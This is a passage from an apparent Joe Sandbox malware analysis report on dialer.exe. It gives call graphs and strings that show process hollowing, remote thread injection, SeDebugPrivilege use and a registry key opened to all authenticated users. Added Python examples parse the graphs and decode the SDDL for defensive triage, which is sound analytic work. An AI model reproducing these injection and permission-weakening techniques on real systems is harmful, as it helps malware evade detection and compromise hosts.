                                                                          • Snapshot File: hcaresult_3_2_7ff762440000_system64x.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                          • String ID:
                                                                          • API String ID: 682475483-0
                                                                          • Opcode ID: d38a7a66502803ee60ea24eddf2a71f1e95afdba96137525794505a2f4712398
                                                                          • Instruction ID: 5c9012b8a6336e9944131173eca247f94e0f7620e7266c54f288cba5a812e98a
                                                                          • Opcode Fuzzy Hash: d38a7a66502803ee60ea24eddf2a71f1e95afdba96137525794505a2f4712398
                                                                          • Instruction Fuzzy Hash: 06011621A09612C1FEC6EB01AE44234E621FF04B91FC80031CA0D97EA4DFACFD99C320

                                                                          Execution Graph

                                                                          Execution Coverage:46.1%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:40.1%
                                                                          Total number of Nodes:227
                                                                          Total number of Limit Nodes:24
                                                                          execution_graph 522 140002524 523 140002531 522->523 524 140002539 522->524 525 1400010c0 30 API calls 523->525 525->524 383 140002bf8 384 140002c05 383->384 386 140002c25 ConnectNamedPipe 384->386 387 140002c1a Sleep 384->387 393 140001b54 AllocateAndInitializeSid 384->393 388 140002c83 Sleep 386->388 389 140002c34 ReadFile 386->389 387->384 391 140002c8e DisconnectNamedPipe 388->391 390 140002c57 WriteFile 389->390 389->391 390->391 391->386 394 140001bb1 SetEntriesInAclW 393->394 395 140001c6f 393->395 394->395 396 140001bf5 LocalAlloc 394->396 395->384 396->395 397 140001c09 InitializeSecurityDescriptor 396->397 397->395 398 140001c19 SetSecurityDescriptorDacl 397->398 398->395 399 140001c30 CreateNamedPipeW 398->399 399->395 400 140002258 403 14000226c 400->403 427 140001f2c 403->427 406 140001f2c 14 API calls 407 14000228f GetCurrentProcessId OpenProcess 406->407 408 140002321 FindResourceA 407->408 409 1400022af OpenProcessToken 407->409 412 140002341 SizeofResource 408->412 413 140002261 ExitProcess 408->413 410 1400022c3 LookupPrivilegeValueW 409->410 411 140002318 FindCloseChangeNotification 409->411 410->411 414 1400022da AdjustTokenPrivileges 410->414 411->408 412->413 415 14000235a LoadResource 412->415 414->411 416 140002312 GetLastError 414->416 415->413 417 14000236e LockResource GetCurrentProcessId 415->417 416->411 441 1400017ec GetProcessHeap RtlAllocateHeap 417->441 419 14000238b RegCreateKeyExW 420 140002489 CreateThread GetProcessHeap HeapAlloc CreateThread CreateThread 419->420 421 1400023cc ConvertStringSecurityDescriptorToSecurityDescriptorW 419->421 422 14000250f SleepEx 420->422 423 1400023f4 RegSetKeySecurity LocalFree 421->423 424 14000240e RegCreateKeyExW 421->424 422->422 423->424 425 140002448 GetCurrentProcessId RegSetValueExW RegCloseKey 424->425 426 14000247f RegCloseKey 424->426 425->426 426->420 428 140001f35 StrCpyW StrCatW GetModuleHandleW 427->428 429 
1400020ff 427->429 428->429 430 140001f86 GetCurrentProcess K32GetModuleInformation 428->430 429->406 431 1400020f6 FreeLibrary 430->431 432 140001fb6 CreateFileW 430->432 431->429 432->431 433 140001feb CreateFileMappingW 432->433 434 140002014 MapViewOfFile 433->434 435 1400020ed CloseHandle 433->435 436 1400020e4 FindCloseChangeNotification 434->436 437 140002037 434->437 435->431 436->435 437->436 438 140002050 lstrcmpi 437->438 440 14000208e 437->440 438->437 439 140002090 VirtualProtect VirtualProtect 438->439 439->436 440->436 447 1400014d8 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 441->447 443 140001885 GetProcessHeap HeapFree 444 140001830 444->443 445 140001851 OpenProcess 444->445 445->444 446 140001867 TerminateProcess CloseHandle 445->446 446->444 448 140001565 447->448 449 14000162f GetProcessHeap RtlDeleteBoundaryDescriptor GetProcessHeap RtlRestoreThreadPreferredUILanguages 447->449 448->449 450 14000157a OpenProcess 448->450 452 14000161a FindCloseChangeNotification 448->452 453 1400015c9 ReadProcessMemory 448->453 449->444 450->448 451 140001597 K32EnumProcessModules 450->451 451->448 451->452 452->448 453->448 454 140002b38 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 455 140002b8e K32EnumProcesses 454->455 456 140002beb Sleep 455->456 458 140002ba3 455->458 456->455 457 140002bdc 457->456 458->457 460 140002540 458->460 461 140002558 460->461 462 14000254d 460->462 461->458 464 1400010c0 462->464 502 1400018ac OpenProcess 464->502 467 1400014ba 467->461 468 140001122 OpenProcess 468->467 469 14000113e OpenProcess 468->469 470 140001161 K32GetModuleFileNameExW 469->470 471 1400011fd NtQueryInformationProcess 469->471 472 1400011aa CloseHandle 470->472 473 14000117a PathFindFileNameW lstrlenW 470->473 474 1400014b1 CloseHandle 471->474 475 140001224 471->475 472->471 477 1400011b8 472->477 473->472 476 140001197 StrCpyW 473->476 474->467 475->474 478 140001230 OpenProcessToken 475->478 476->472 477->471 479 1400011d8 
StrCmpIW 477->479 478->474 480 14000124e GetTokenInformation 478->480 479->474 479->477 481 1400012f1 480->481 482 140001276 GetLastError 480->482 483 1400012f8 CloseHandle 481->483 482->481 484 140001281 LocalAlloc 482->484 483->474 489 14000130c 483->489 484->481 485 140001297 GetTokenInformation 484->485 486 1400012df 485->486 487 1400012bf GetSidSubAuthorityCount GetSidSubAuthority 485->487 488 1400012e6 LocalFree 486->488 487->488 488->483 489->474 490 14000139b StrStrA 489->490 491 1400013c3 489->491 490->489 492 1400013c8 490->492 491->474 492->474 493 1400013f3 VirtualAllocEx 492->493 493->474 494 140001420 WriteProcessMemory 493->494 494->474 495 14000143b 494->495 507 14000211c 495->507 497 14000145b 497->474 498 140001478 WaitForSingleObject 497->498 501 140001471 FindCloseChangeNotification 497->501 500 140001487 GetExitCodeThread 498->500 498->501 500->501 501->474 503 14000110e 502->503 504 1400018d8 IsWow64Process 502->504 503->467 503->468 505 1400018f8 FindCloseChangeNotification 504->505 506 1400018ea 504->506 505->503 506->505 510 140001914 GetModuleHandleA 507->510 511 140001934 GetProcAddress 510->511 512 14000193d 510->512 511->512 513 1400021d0 514 1400021dd 513->514 515 140001b54 6 API calls 514->515 516 1400021f2 Sleep 514->516 517 1400021fd ConnectNamedPipe 514->517 515->514 516->514 518 140002241 Sleep 517->518 519 14000220c ReadFile 517->519 520 14000224c DisconnectNamedPipe 518->520 519->520 521 14000222f 519->521 520->517 521->520 526 140002560 527 140002592 526->527 528 14000273a 526->528 529 1400026c6 GetProcessHeap HeapAlloc K32EnumProcesses 527->529 530 140002598 527->530 531 140002748 528->531 532 14000297e ReadFile 528->532 533 140002633 529->533 535 140002704 529->535 536 1400025a5 530->536 537 1400026bd ExitProcess 530->537 538 140002751 531->538 539 140002974 531->539 532->533 534 1400029a8 532->534 534->533 547 1400018ac 3 API calls 534->547 535->533 549 1400010c0 30 API calls 535->549 543 1400025ae 536->543 544 140002660 
RegOpenKeyExW 536->544 540 140002919 538->540 541 14000275c 538->541 542 14000175c 22 API calls 539->542 548 140001944 ReadFile 540->548 545 140002761 541->545 546 14000279d 541->546 542->533 543->533 559 1400025cb ReadFile 543->559 550 1400026a1 544->550 551 14000268d RegDeleteValueW 544->551 545->533 608 14000217c 545->608 611 140001944 546->611 552 1400029c7 547->552 554 140002928 548->554 549->535 595 1400019c4 SysAllocString SysAllocString CoInitializeEx 550->595 551->550 552->533 563 1400029db GetProcessHeap HeapAlloc 552->563 564 140002638 552->564 554->533 566 140001944 ReadFile 554->566 558 1400026a6 603 14000175c GetProcessHeap HeapAlloc 558->603 559->533 561 1400025f5 559->561 561->533 573 1400018ac 3 API calls 561->573 569 1400014d8 13 API calls 563->569 575 140002a90 4 API calls 564->575 565 1400027b4 ReadFile 565->533 570 1400027dc 565->570 571 14000293f 566->571 586 140002a14 569->586 570->533 576 1400027e9 GetProcessHeap HeapAlloc ReadFile 570->576 571->533 577 140002947 ShellExecuteW 571->577 579 140002614 573->579 575->533 581 14000290b GetProcessHeap 576->581 582 14000282d 576->582 577->533 579->533 579->564 585 140002624 579->585 580 140002a49 GetProcessHeap 583 140002a52 HeapFree 580->583 581->583 582->581 587 140002881 lstrlenW GetProcessHeap HeapAlloc 582->587 588 14000285e 582->588 583->533 589 1400010c0 30 API calls 585->589 586->580 635 1400016cc 586->635 629 140002a90 CreateFileW 587->629 588->581 615 140001c88 588->615 589->533 596 140001a11 CoInitializeSecurity 595->596 597 140001b2c SysFreeString SysFreeString 595->597 598 140001a59 CoCreateInstance 596->598 599 140001a4d 596->599 597->558 600 140001b26 CoUninitialize 598->600 601 140001a88 VariantInit 598->601 599->598 599->600 600->597 602 140001ade 601->602 602->600 604 1400014d8 13 API calls 603->604 606 14000179a 604->606 605 1400017c8 GetProcessHeap HeapFree 606->605 607 1400016cc 5 API calls 606->607 607->606 609 140001914 2 API calls 608->609 610 140002191 609->610 612 
140001968 ReadFile 611->612 613 14000198b 612->613 614 1400019a5 612->614 613->612 613->614 614->533 614->565 616 140001cbb 615->616 617 140001cce CreateProcessW 616->617 619 140001e97 616->619 621 140001e62 OpenProcess 616->621 623 140001dd2 VirtualAlloc 616->623 625 140001d8c WriteProcessMemory 616->625 617->616 618 140001d2b VirtualAllocEx 617->618 618->616 620 140001d60 WriteProcessMemory 618->620 619->581 620->616 621->616 622 140001e78 TerminateProcess 621->622 622->616 623->616 624 140001df1 GetThreadContext 623->624 624->616 626 140001e09 WriteProcessMemory 624->626 625->616 626->616 627 140001e30 SetThreadContext 626->627 627->616 628 140001e4e ResumeThread 627->628 628->616 628->619 630 1400028f7 GetProcessHeap HeapFree 629->630 631 140002ada WriteFile 629->631 630->581 632 140002b1c CloseHandle 631->632 633 140002afe 631->633 632->630 633->632 634 140002b02 WriteFile 633->634 634->632 636 140001745 635->636 637 1400016eb OpenProcess 635->637 636->580 637->636 638 140001703 637->638 639 14000211c 2 API calls 638->639 640 140001723 639->640 641 14000173c CloseHandle 640->641 642 140001731 CloseHandle 640->642 641->636 642->641
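The execution graph and the control-flow graphs on this page are serialized as a flat token stream: a node is a decimal id followed by an address (or an address range), then the API names or `call <target>` markers attributed to that node, and every `a->b` token is an edge. Read that way, nodes 615-628 of the execution graph (the function at 140001c88 in dialer.exe, process 17) show CreateProcessW, VirtualAllocEx and WriteProcessMemory into the child, then GetThreadContext, SetThreadContext and ResumeThread: the process-hollowing order behind the "Injects a PE file into a foreign processes" and "Modifies the context of a thread in another process" signatures. The Python below is an added example for this report, not code from Joe Sandbox or from the sample: it parses the graph text into nodes and edges and checks whether a given API sequence occurs in reachable order. The embedded graph text is an excerpt of the page's execution graph (nodes 615-628 only; the edge 619->581 points outside the excerpt), and the HOLLOWING sequence is this example's own choice of what to search for.

```python
"""Parse the node/edge text that Joe Sandbox emits for its execution and
control-flow graphs, then search it for an ordered sequence of API calls.
Added example for this report; not Joe Sandbox's or the sample's code."""
import re
from collections import deque

# Constructed sample: an excerpt of the execution graph above (nodes 615-628,
# the function at 140001c88 in dialer.exe). The leading keyword and the other
# nodes are omitted; the token format is exactly the page's.
SAMPLE_EXECUTION_GRAPH = (
    "615 140001c88 616 140001cbb 615->616 617 140001cce CreateProcessW 616->617 "
    "619 140001e97 616->619 621 140001e62 OpenProcess 616->621 "
    "623 140001dd2 VirtualAlloc 616->623 625 140001d8c WriteProcessMemory 616->625 "
    "617->616 618 140001d2b VirtualAllocEx 617->618 618->616 "
    "620 140001d60 WriteProcessMemory 618->620 619->581 620->616 621->616 "
    "622 140001e78 TerminateProcess 621->622 622->616 623->616 "
    "624 140001df1 GetThreadContext 623->624 624->616 "
    "626 140001e09 WriteProcessMemory 624->626 625->616 626->616 "
    "627 140001e30 SetThreadContext 626->627 627->616 "
    "628 140001e4e ResumeThread 627->628 628->616 628->619"
)

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
# A node address is a hex offset or a range such as 7ff762441e10-7ff762441e2d.
ADDR_RE = re.compile(r"^[0-9a-f]{7,16}(-[0-9a-f]{7,16})?$")


def parse_graph(text):
    """Return (nodes, edges): nodes maps id -> {"addr", "labels"}, edges maps
    id -> set of successor ids. Labels are the tokens that follow a node's
    address (API names, "call <target>", "signal", "N API calls")."""
    tokens = text.split()
    if tokens and tokens[0] in ("execution_graph", "control_flow_graph"):
        tokens = tokens[1:]
    nodes, edges, current, i = {}, {}, None, 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE_RE.match(tok)
        if edge:
            edges.setdefault(edge.group(1), set()).add(edge.group(2))
            i += 1
            continue
        nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
        # A short decimal token followed by an address opens a new node.
        if tok.isdigit() and len(tok) <= 5 and ADDR_RE.match(nxt):
            current = tok
            nodes[current] = {"addr": nxt, "labels": []}
            i += 2
            continue
        if current is not None:
            if tok == "call" and nxt:          # keep "call <target>" as one label
                nodes[current]["labels"].append(f"call {nxt}")
                i += 2
                continue
            nodes[current]["labels"].append(tok)
        i += 1
    # Edges may name nodes outside the parsed text (here 619->581).
    for src, dsts in edges.items():
        for n in (src, *dsts):
            nodes.setdefault(n, {"addr": "", "labels": []})
    return nodes, edges


def nodes_calling(nodes, api):
    return {n for n, d in nodes.items() if api in d["labels"]}


def find_ordered_calls(nodes, edges, api_sequence):
    """Find node ids n0..nk where n_j calls api_sequence[j] and each n_j is
    reachable from n_{j-1}. Returns the ids, or None if no such chain exists.
    Adjacency is walked in numeric order so the result is deterministic."""
    if not api_sequence:
        return []
    frontier = {n: [n] for n in sorted(nodes_calling(nodes, api_sequence[0]), key=int)}
    for api in api_sequence[1:]:
        targets = nodes_calling(nodes, api)
        advanced = {}
        for start, path in frontier.items():
            seen, queue = {start}, deque([start])
            while queue:
                cur = queue.popleft()
                for nxt in sorted(edges.get(cur, ()), key=int):
                    if nxt in seen:
                        continue
                    seen.add(nxt)
                    if nxt in targets and nxt not in advanced:
                        advanced[nxt] = path + [nxt]
                    queue.append(nxt)
        if not advanced:
            return None
        frontier = advanced
    return next(iter(frontier.values()))


# Process hollowing: a child is created, memory is written into it, its thread
# context is redirected, and the thread is resumed.
HOLLOWING = ["CreateProcessW", "VirtualAllocEx", "WriteProcessMemory",
             "GetThreadContext", "SetThreadContext", "ResumeThread"]


def describe(nodes, path):
    """Render a found chain as 'addr:API' steps for a report."""
    return [f"{nodes[n]['addr']}:{'/'.join(nodes[n]['labels'])}" for n in path]


if __name__ == "__main__":
    N, E = parse_graph(SAMPLE_EXECUTION_GRAPH)
    chain = find_ordered_calls(N, E, HOLLOWING)
    print("hollowing chain:", describe(N, chain) if chain else "not found")
```

Within this one function every block returns to node 616, so any order of these APIs is reachable inside it; the search earns its keep on the full execution_graph line (all 227 nodes), where it tells you which node ids, and therefore which addresses, to read in the dump for a given call order.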

                                                                          Callgraph

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2486526895.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000011.00000002.2486319584.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000011.00000002.2486685714.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000011.00000002.2486771111.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess$Close$CurrentResource$FileFindSecurityThread$ChangeDescriptorFreeHandleHeapModuleNotificationOpenProtectTokenValueVirtual$AdjustAllocConvertErrorInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
                                                                          • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                                                                          • API String ID: 1970497257-1130149537
                                                                          • Opcode ID: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                                          • Instruction ID: c2e61514e361dd61edc66d1a85693de1d2c237bf329a5b31df93bef4cff25afe
                                                                          • Opcode Fuzzy Hash: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                                          • Instruction Fuzzy Hash: B781E4B6200B4196EB26CF62F8547D977A9F78CBD8F44512AEB4A43A78DF38C148C740
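The string D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA) in this function's string list is SDDL: a DACL of two allow ACEs, each with OBJECT_INHERIT and CONTAINER_INHERIT, granting GENERIC_ALL to Authenticated Users (AU) and to the built-in Administrators group (BA). In the execution graph the same function calls ConvertStringSecurityDescriptorToSecurityDescriptorW and then RegSetKeySecurity right after RegCreateKeyExW, so the descriptor is most plausibly applied to the SOFTWARE\dialerconfig key; if so, any authenticated user on the host, not only administrators, can read and rewrite that key. The decoder below is an added example for this report, not code from the sample or from Joe Sandbox: it parses an SDDL string offline and flags allow ACEs that give write-class rights to broad groups. Its abbreviation tables cover common well-known SIDs and rights only, and conditional ACEs are not handled.

```python
"""Decode a Windows SDDL string and flag ACEs that give broad groups
write-class access. Added example for this report; not the sample's code."""
import re

# The descriptor string recovered from dialer.exe (String ID above).
DIALER_SDDL = "D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)"

ACE_TYPES = {"A": "ACCESS_ALLOWED", "D": "ACCESS_DENIED",
             "AU": "SYSTEM_AUDIT", "AL": "SYSTEM_ALARM"}
ACE_FLAGS = {"OI": "OBJECT_INHERIT", "CI": "CONTAINER_INHERIT",
             "NP": "NO_PROPAGATE_INHERIT", "IO": "INHERIT_ONLY", "ID": "INHERITED",
             "SA": "SUCCESSFUL_ACCESS", "FA": "FAILED_ACCESS"}
RIGHTS = {"GA": "GENERIC_ALL", "GR": "GENERIC_READ", "GW": "GENERIC_WRITE",
          "GX": "GENERIC_EXECUTE", "RC": "READ_CONTROL", "SD": "DELETE",
          "WD": "WRITE_DAC", "WO": "WRITE_OWNER", "FA": "FILE_ALL_ACCESS",
          "FR": "FILE_GENERIC_READ", "FW": "FILE_GENERIC_WRITE",
          "KA": "KEY_ALL_ACCESS", "KR": "KEY_READ", "KW": "KEY_WRITE"}
# Bits of an explicit hex access mask (generic and standard rights).
MASK_BITS = [(0x80000000, "GENERIC_READ"), (0x40000000, "GENERIC_WRITE"),
             (0x20000000, "GENERIC_EXECUTE"), (0x10000000, "GENERIC_ALL"),
             (0x00080000, "WRITE_OWNER"), (0x00040000, "WRITE_DAC"),
             (0x00020000, "READ_CONTROL"), (0x00010000, "DELETE"),
             (0x00100000, "SYNCHRONIZE")]
# Well-known SID abbreviations; anything else is passed through as written.
TRUSTEES = {"AU": "S-1-5-11 Authenticated Users", "BA": "S-1-5-32-544 Administrators",
            "BU": "S-1-5-32-545 Users", "SY": "S-1-5-18 Local System",
            "WD": "S-1-1-0 Everyone", "IU": "S-1-5-4 Interactive",
            "AN": "S-1-5-7 Anonymous", "CO": "S-1-3-0 Creator Owner",
            "NS": "S-1-5-20 Network Service", "LS": "S-1-5-19 Local Service"}
# Rights that let the holder change the object or its security descriptor.
WRITE_CLASS = {"GENERIC_ALL", "GENERIC_WRITE", "WRITE_DAC", "WRITE_OWNER",
               "FILE_ALL_ACCESS", "FILE_GENERIC_WRITE", "KEY_ALL_ACCESS", "KEY_WRITE"}
BROAD_GROUPS = {"AU", "BU", "WD", "IU", "AN"}


def _pairs(field):
    """Split a run of two-letter codes ('OICI' -> ['OI', 'CI'])."""
    return [field[i:i + 2] for i in range(0, len(field), 2)]


def _rights(field):
    if field.startswith("0x"):                  # explicit access mask
        mask = int(field, 16)
        names = [name for bit, name in MASK_BITS if mask & bit]
        if mask & 0xFFFF:                       # object-specific low bits
            names.append(f"SPECIFIC_{mask & 0xFFFF:#06x}")
        return names
    return [RIGHTS.get(code, code) for code in _pairs(field)]


def split_sections(sddl):
    """Return the O:, G:, D: and S: parts as {'O': ..., 'D': ...}. A section
    marker only counts outside parentheses, so 'GA' inside an ACE is not G:."""
    sections, key, depth, i = {}, None, 0, 0
    while i < len(sddl):
        ch = sddl[i]
        if depth == 0 and ch in "OGDS" and sddl[i + 1:i + 2] == ":":
            key = ch
            sections[key] = ""
            i += 2
            continue
        depth += (ch == "(") - (ch == ")")
        if key is not None:
            sections[key] += ch
        i += 1
    return sections


def parse_aces(acl_text):
    """Decode '(type;flags;rights;object;inherit_object;trustee)' entries.
    Conditional ACEs (a seventh, parenthesised field) are not supported."""
    aces = []
    for body in re.findall(r"\(([^)]*)\)", acl_text):
        fields = body.split(";")
        if len(fields) != 6:
            raise ValueError(f"unsupported ACE: ({body})")
        ace_type, flags, rights, obj, inh_obj, trustee = fields
        aces.append({"type": ACE_TYPES.get(ace_type, ace_type),
                     "flags": [ACE_FLAGS.get(f, f) for f in _pairs(flags)],
                     "rights": _rights(rights),
                     "object": obj, "inherit_object": inh_obj,
                     "trustee": trustee,
                     "trustee_name": TRUSTEES.get(trustee, trustee)})
    return aces


def parse_sddl(sddl):
    sec = split_sections(sddl)
    dacl_text = sec.get("D", "")
    return {"owner": sec.get("O"), "group": sec.get("G"),
            "dacl_flags": re.findall(r"AI|AR|P", dacl_text.split("(", 1)[0]),
            "dacl": parse_aces(dacl_text),
            "sacl": parse_aces(sec.get("S", ""))}


def broad_write_grants(sddl):
    """Trustee abbreviations that an allow ACE gives write-class rights to and
    that denote broad groups. An SDDL without a D: part carries no DACL at all
    (the object would be open to everyone), reported as 'NO_DACL'."""
    sec = split_sections(sddl)
    if "D" not in sec:
        return ["NO_DACL"]
    return [ace["trustee"] for ace in parse_aces(sec["D"])
            if ace["type"] == "ACCESS_ALLOWED"
            and ace["trustee"] in BROAD_GROUPS
            and WRITE_CLASS & set(ace["rights"])]


if __name__ == "__main__":
    for ace in parse_sddl(DIALER_SDDL)["dacl"]:
        print(ace["type"], ace["flags"], ace["rights"], ace["trustee_name"])
    print("broad write grants:", broad_write_grants(DIALER_SDDL))
```

On a live host the same question is answered by Get-Acl on HKLM:\SOFTWARE\dialerconfig; the decoder is for the string as recovered from the binary, when no infected host is at hand. Deny ACEs are skipped on purpose, since a later deny in a canonical DACL narrows rather than widens access.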

                                                                          Control-flow Graph

                                                                          control_flow_graph 24 1400010c0-140001110 call 1400018ac 27 140001116-14000111c 24->27 28 1400014ba-1400014d6 24->28 27->28 29 140001122-140001138 OpenProcess 27->29 29->28 30 14000113e-14000115b OpenProcess 29->30 31 140001161-140001178 K32GetModuleFileNameExW 30->31 32 1400011fd-14000121e NtQueryInformationProcess 30->32 33 1400011aa-1400011b6 CloseHandle 31->33 34 14000117a-140001195 PathFindFileNameW lstrlenW 31->34 35 1400014b1-1400014b4 CloseHandle 32->35 36 140001224-14000122a 32->36 33->32 38 1400011b8-1400011d3 33->38 34->33 37 140001197-1400011a7 StrCpyW 34->37 35->28 36->35 39 140001230-140001248 OpenProcessToken 36->39 37->33 40 1400011d8-1400011ea StrCmpIW 38->40 39->35 41 14000124e-140001274 GetTokenInformation 39->41 40->35 42 1400011f0-1400011fb 40->42 43 1400012f1 41->43 44 140001276-14000127f GetLastError 41->44 42->32 42->40 45 1400012f8-140001306 CloseHandle 43->45 44->43 46 140001281-140001295 LocalAlloc 44->46 45->35 47 14000130c-140001313 45->47 46->43 48 140001297-1400012bd GetTokenInformation 46->48 47->35 51 140001319-140001324 47->51 49 1400012df 48->49 50 1400012bf-1400012dd GetSidSubAuthorityCount GetSidSubAuthority 48->50 52 1400012e6-1400012ef LocalFree 49->52 50->52 51->35 53 14000132a-140001334 51->53 52->45 53->35 54 14000133a-140001344 53->54 54->35 55 14000134a-14000138a call 140001ec4 * 3 54->55 55->35 62 140001390-1400013b0 call 140001ec4 StrStrA 55->62 65 1400013b2-1400013c1 62->65 66 1400013c8-1400013ed call 140001ec4 * 2 62->66 65->62 67 1400013c3 65->67 66->35 72 1400013f3-14000141a VirtualAllocEx 66->72 67->35 72->35 73 140001420-140001439 WriteProcessMemory 72->73 73->35 74 14000143b-14000145d call 14000211c 73->74 74->35 77 14000145f-140001467 74->77 77->35 78 140001469-14000146f 77->78 79 140001471-140001476 78->79 80 140001478-140001485 WaitForSingleObject 78->80 81 1400014ab FindCloseChangeNotification 79->81 82 1400014a6 80->82 83 140001487-14000149b GetExitCodeThread 80->83 81->35 82->81 83->82 84 14000149d-1400014a3 83->84 84->82
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2486526895.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000011.00000002.2486319584.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000011.00000002.2486685714.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000011.00000002.2486771111.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Process$Close$Open$FindHandleInformationToken$AllocAuthorityChangeFileLocalNameNotification$CodeCountErrorExitFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
                                                                          • String ID: @$MSBuild.exe$ReflectiveDllMain$dialer.exe
                                                                          • API String ID: 2998269048-3753927220
                                                                          • Opcode ID: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                                          • Instruction ID: 2175fd9260984ecd3e092ef955109d5d50fbfcc0bf213717558b1eb8b1c9701c
                                                                          • Opcode Fuzzy Hash: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                                          • Instruction Fuzzy Hash: 40B138B260468186EB26DF27F8947E927A9FB8CBC4F404125AF4A477B4EF38C645C740

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2486526895.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000011.00000002.2486319584.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000011.00000002.2486685714.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000011.00000002.2486771111.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Process$Heap$AllocEnum$BoundaryChangeCloseDeleteDescriptorFindLanguagesMemoryModulesNotificationOpenPreferredProcessesReadRestoreThread
                                                                          • String ID:
                                                                          • API String ID: 2219672174-0
                                                                          • Opcode ID: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                                          • Instruction ID: 4858e5a3d965c592fcd1f5951e26bd94c88d4916acf90710a0b336d1aa1e032e
                                                                          • Opcode Fuzzy Hash: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                                          • Instruction Fuzzy Hash: E6519DB2711A819AEB66CF63E8587EA22A5F78DBC4F444025EF4947764DF38C545C700

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2486526895.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000011.00000002.2486319584.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000011.00000002.2486685714.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000011.00000002.2486771111.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                                          • String ID:
                                                                          • API String ID: 3197395349-0
                                                                          • Opcode ID: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                                          • Instruction ID: 21eaad2a8fcaa81d39f01622d1c01d05a8059e075f91819b3ade9b41c51f013a
                                                                          • Opcode Fuzzy Hash: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                                          • Instruction Fuzzy Hash: FA318D72215691CAE761CF25F490BDE77A5F748B98F40521AFB4947FA8EB78C208CB40

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetProcessHeap.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001801
                                                                          • RtlAllocateHeap.NTDLL(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001812
                                                                            • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000150B
                                                                            • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000151E
                                                                            • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000152C
                                                                            • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000153D
                                                                            • Part of subcall function 00000001400014D8: K32EnumProcesses.KERNEL32 ref: 0000000140001557
                                                                            • Part of subcall function 00000001400014D8: OpenProcess.KERNEL32 ref: 0000000140001585
                                                                            • Part of subcall function 00000001400014D8: K32EnumProcessModules.KERNEL32 ref: 00000001400015AA
                                                                            • Part of subcall function 00000001400014D8: ReadProcessMemory.KERNELBASE ref: 00000001400015E1
                                                                            • Part of subcall function 00000001400014D8: FindCloseChangeNotification.KERNELBASE ref: 000000014000161D
                                                                            • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000162F
